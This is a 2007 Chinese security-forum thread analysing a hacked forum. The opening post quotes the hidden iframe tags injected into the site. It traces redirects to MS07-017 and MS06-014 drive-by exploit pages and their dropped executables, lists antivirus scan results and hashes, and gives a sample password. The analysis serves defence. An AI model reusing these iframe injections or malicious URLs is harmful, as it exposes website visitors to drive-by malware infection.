查看: 2251|回复: 6
收起左侧

[病毒样本] 又一个挂马的——xunchi论坛

[复制链接]
dikex
发表于 2007-5-17 11:57:12 | 显示全部楼层 |阅读模式
根据剑盟的astre提供的信息,找到了这个被挂马的论坛(http://bbs.xunchi.org/);
注:突然发现原来astre也在卡饭这里发贴了……

——————————————————————————————————————————————————————————————

源码最下面被iframe上了http://www.hardup.cn/,里面有代码:
<IFRAME src="http://61.152.169.194/sysqq.htm" width=100 height=0></IFRAME>
<IFRAME src="http://www.almeo.cn/people.htm" width=0 height=0></IFRAME>

——————————————————————————————————————————————————————————————

http://61.152.169.194/sysqq.htm:
里面根据操作系统(XP,2003,2000)自动跳转到不同的页面:
XP:http://61.152.169.194/baobao.htm
2003:http://61.152.169.194/06014.htm
2000:http://61.152.169.194/banner.htm
baobao.htm里面为一个MS07-017网马(http://61.152.169.194/ani.c);
06014.htm看名字就知道是MS06-014网马了;
这个两个都是挂了http://61.152.196.194/007.exe;(连接不上……)
而banner.htm是一个人为制作的“找不到服务器”的提示页,上面居然什么毒也没有?!

——————————————————————————————————————————————————————————————

http://www.almeo.cn/people.htm是一个MS06-014网马,挂了http://love.5d6h.cn/ai/soft/cj.exe;
报毒的杀软数量一般般啦:


AhnLab-V32007.5.16.105.16.2007Win32/NSAnti.suspicious
AntiVir7.4.0.2305.16.2007HEUR/Crypted
Authentium4.93.805.16.2007 no virus found
Avast4.7.997.005.16.2007Win32:Agent-DSC
AVG7.5.0.46705.16.2007 no virus found
BitDefender7.205.17.2007Trojan.Popwin.CE
CAT-QuickHeal9.0005.16.2007(Suspicious) - DNAScan
ClamAVdevel-2007041605.16.2007 no virus found
DrWeb4.3305.16.2007 no virus found
eSafe7.0.15.005.16.2007suspicious Trojan/Worm
eTrust-Vet30.7.363805.17.2007 no virus found
Ewido4.005.16.2007 no virus found
FileAdvisor105.17.2007 no virus found
Fortinet2.85.0.005.17.2007suspicious
F-Prot4.3.2.4805.16.2007 no virus found
F-Secure6.70.13030.005.17.2007 no virus found
IkarusT3.1.1.705.16.2007Backdoor.Win32.Hupigon.BV
Kaspersky4.0.2.2405.17.2007 no virus found
McAfee503205.16.2007 no virus found
Microsoft1.250305.17.2007VirTool:Win32/Obfuscator.A
NOD32v2227205.17.2007a variant of Win32/Agent.NEO
Norman5.80.0205.16.2007 no virus found
Panda9.0.0.405.16.2007Suspicious file
Prevx1V205.17.2007 no virus found
Sophos4.17.005.16.2007 no virus found
Sunbelt2.2.907.005.17.2007VIPRE.Suspicious
Symantec1005.17.2007 no virus found
TheHacker6.1.6.11505.15.2007 no virus found
VBA323.12.005.16.2007 no virus found
VirusBuster4.3.7:905.16.2007 no virus found
Webwasher-Gateway6.0.105.17.2007Heuristic.Crypted



Aditional Information
File size: 19090 bytes
MD5: 6f3919aaa65e6b76f68a8fcaab1a1b09
SHA1: 1717279eb812b90f8c9fb302aa6c8c3d34d465bb
packers: NsPack, NsPack
packers: NSPack, PE_Patch
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.



——————————————————————————————————————————————————————————————

样本密码virus

[ 本帖最后由 dikex 于 2007-5-17 12:01 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
buycard
发表于 2007-5-17 12:02:30 | 显示全部楼层
貌似前几天已经发过了这个样本
wangjay1980
发表于 2007-5-17 12:10:47 | 显示全部楼层
detected: virus Trojan.Generic (modification)        File: C:\Documents and Settings\Owner\×&Agrave;&Atilde;&aelig;\cj.rar/cj.exe
小邪邪
发表于 2007-5-17 12:35:33 | 显示全部楼层
  进去之后MCAFEE没动静
The EQs
发表于 2007-5-17 12:36:14 | 显示全部楼层
packers: NsPack, NsPack
packers: NSPack, PE_Patch
bridgewr
发表于 2007-5-17 17:48:49 | 显示全部楼层
微点杀鸟

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
promised
发表于 2007-5-17 18:00:05 | 显示全部楼层
改时间的东东
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-12 10:42 , Processed in 0.118685 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表